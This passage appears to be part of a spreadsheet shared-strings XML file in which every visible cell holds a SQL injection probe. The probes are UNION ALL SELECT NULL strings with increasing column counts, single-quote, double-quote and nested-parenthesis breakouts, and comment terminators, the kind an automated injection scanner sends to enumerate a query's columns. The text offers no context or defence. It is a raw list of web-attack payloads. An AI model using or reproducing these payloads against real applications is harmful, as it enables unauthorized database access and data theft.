    <t>' )  UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL-- AND  ( 'UEOj' LIKE 'UEOj</t>
  </si>
  <si>
    <t>' )  UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL-- AND  ( 'ybWr' LIKE 'ybWr</t>
  </si>
  <si>
    <t>' )  UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL-- AND  ( 'pWYG' LIKE 'pWYG</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</si>
  <si>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'GvSu' LIKE 'GvSu</t>
  </si>
  <si>
    <t>'  )  )   UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL-- AND   (  (  'bFcA' LIKE 'bFcA</t>
  </si>
  <si>
    <t>'  )  )   UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL-- AND   (  (  'WaIb' LIKE 'WaIb</t>
  </si>
  <si>
    <t>'  )  )   UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL-- AND   (  (  'Pcpp' LIKE 'Pcpp</t>
  </si>
  <si>
    <t>'  )  )   UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL-- AND   (  (  'WOjH' LIKE 'WOjH</t>
  </si>
  <si>
    <t>'  )  )   UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL-- AND   (  (  'gVCG' LIKE 'gVCG</t>
  </si>
  <si>
    <t>'  )  )   UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL-- AND   (  (  'Akvr' LIKE 'Akvr</t>
  </si>
  <si>
    <t>'  )  )   UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL-- AND   (  (  'EKEO' LIKE 'EKEO</t>
  </si>
  <si>
    <t>'  )  )   UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL-- AND   (  (  'QjOG' LIKE 'QjOG</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</si>
  <si>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'XxAS' LIKE 'XxAS</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</si>
  <si>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'wuVY' LIKE 'wuVY</t>
  </si>
  <si>
    <t>'  )  )   )  UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL-- AND   (  (   ( 'UBPB' LIKE 'UBPB</t>
  </si>
  <si>
    <t>'  )  )   )  UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL-- AND   (  (   ( 'lGXF' LIKE 'lGXF</t>
  </si>
  <si>
    <t>'  )  )   )  UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL-- AND   (  (   ( 'OodF' LIKE 'OodF</t>
  </si>
  <si>
    <t>'  )  )   )  UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL-- AND   (  (   ( 'oYqg' LIKE 'oYqg</t>
  </si>
  <si>
    <t>'  )  )   )  UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL-- AND   (  (   ( 'LAPi' LIKE 'LAPi</t>
  </si>
  <si>
    <t>'  )  )   )  UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL-- AND   (  (   ( 'AKJs' LIKE 'AKJs</t>
  </si>
  <si>
    <t>'  )  )   )  UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL-- AND   (  (   ( 'Ebwv' LIKE 'Ebwv</t>
  </si>
  <si>
    <t>'  )  )   )  UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL-- AND   (  (   ( 'jECA' LIKE 'jECA</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</si>
  <si>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'IpSd' LIKE 'IpSd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</si>
  <si>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'fQHp' LIKE 'fQHp</t>
  </si>
  <si>
    <t>' UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL-- AND 'wKxf' LIKE 'wKxf</t>
  </si>
  <si>
    <t>' UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL-- AND 'RAmP' LIKE 'RAmP</t>
  </si>
  <si>
    <t>' UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL-- AND 'RMuD' LIKE 'RMuD</t>
  </si>
  <si>
    <t>' UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL-- AND 'PFTW' LIKE 'PFTW</t>
  </si>
  <si>
    <t>' UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL-- AND 'JSyM' LIKE 'JSyM</t>
  </si>
  <si>
    <t>' UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL-- AND 'TdFd' LIKE 'TdFd</t>
  </si>
  <si>
    <t>' UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL-- AND 'jOpS' LIKE 'jOpS</t>
  </si>
  <si>
    <t>' UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL-- AND 'AUiY' LIKE 'AUiY</t>
  </si>
  <si>
    <t>' UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL-- AND 'keOx' LIKE 'keOx</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</si>
  <si>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'OZAC' LIKE 'OZAC</t>
  </si>
  <si>
    <t>" )  UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL-- AND  ( "Tpkt" = "Tpkt</t>
  </si>
  <si>
    <t>" )  UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL-- AND  ( "lEGp" = "lEGp</t>
  </si>
  <si>
    <t>" )  UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL-- AND  ( "qbdM" = "qbdM</t>
  </si>
  <si>
    <t>" )  UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL-- AND  ( "RDJB" = "RDJB</t>
  </si>
  <si>
    <t>" )  UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL-- AND  ( "gznP" = "gznP</t>
  </si>
  <si>
    <t>" )  UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL-- AND  ( "pJhw" = "pJhw</t>
  </si>
  <si>
    <t>" )  UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL-- AND  ( "HNSI" = "HNSI</t>
  </si>
  <si>
    <t>" )  UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL-- AND  ( "cmxl" = "cmxl</t>
  </si>
  <si>
    <t>" )  UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL-- AND  ( "DlCQ" = "DlCQ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</si>
  <si>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"rjSS" = "rjSS</t>
  </si>
  <si>
    <t>"  )  )   UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL-- AND   (  (  "iUvc" = "iUvc</t>
  </si>
  <si>
    <t>"  )  )   UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL-- AND   (  (  "qXdi" = "qXdi</t>
  </si>
  <si>
    <t>"  )  )   UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL-- AND   (  (  "ImVG" = "ImVG</t>
  </si>
  <si>
    <t>"  )  )   UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL-- AND   (  (  "konH" = "konH</t>
  </si>
  <si>
    <t>"  )  )   UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL-- AND   (  (  "cjyK" = "cjyK</t>
  </si>
  <si>
    <t>"  )  )   UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL-- AND   (  (  "ktmG" = "ktmG</t>
  </si>
  <si>
    <t>"  )  )   UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL-- AND   (  (  "hdMm" = "hdMm</t>
  </si>
  <si>
    <t>"  )  )   UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL-- AND   (  (  "vWOZ" = "vWOZ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</si>
  <si>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"BGHd" = "BGHd</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</si>
  <si>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"kwca" = "kwca</t>
  </si>
  <si>
    <t>"  )  )   )  UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL-- AND   (  (   ( "yNjQ" = "yNjQ</t>
  </si>
  <si>
    <t>"  )  )   )  UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL-- AND   (  (   ( "JuyR" = "JuyR</t>
  </si>
  <si>
    <t>"  )  )   )  UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL-- AND   (  (   ( "nLdr" = "nLdr</t>
  </si>
  <si>
    <t>"  )  )   )  UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL-- AND   (  (   ( "OmZl" = "OmZl</t>
  </si>
  <si>
    <t>"  )  )   )  UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL-- AND   (  (   ( "CrmQ" = "CrmQ</t>
  </si>
  <si>
    <t>"  )  )   )  UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL-- AND   (  (   ( "ZJSv" = "ZJSv</t>
  </si>
  <si>
    <t>"  )  )   )  UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL-- AND   (  (   ( "ZgIB" = "ZgIB</t>
  </si>
  <si>
    <t>"  )  )   )  UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL-- AND   (  (   ( "TOGw" = "TOGw</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</si>
  <si>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"elFO" = "elFO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</si>
  <si>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"UGHS" = "UGHS</t>
  </si>
  <si>
    <t>" UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL-- AND "KWUK" = "KWUK</t>
  </si>
  <si>
    <t>" UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL-- AND "MEwH" = "MEwH</t>
  </si>
  <si>
    <t>" UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL-- AND "ZyRx" = "ZyRx</t>
  </si>
  <si>
    <t>" UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL-- AND "SJoy" = "SJoy</t>
  </si>
  <si>
    <t>" UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL-- AND "twwF" = "twwF</t>
  </si>
  <si>
    <t>" UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL-- AND "xiqP" = "xiqP</t>
  </si>
  <si>
    <t>" UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL-- AND "pIuY" = "pIuY</t>
  </si>
  <si>
    <t>" UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL-- AND "RFRP" = "RFRP</t>
  </si>
  <si>
    <t>" UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL-- AND "EXgv" = "EXgv</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</si>
  <si>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"ETxN" = "ETxN</t>
  </si>
  <si>
    <t>" )  UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL-- AND  ( "zhAD" LIKE "zhAD</t>
  </si>
  <si>
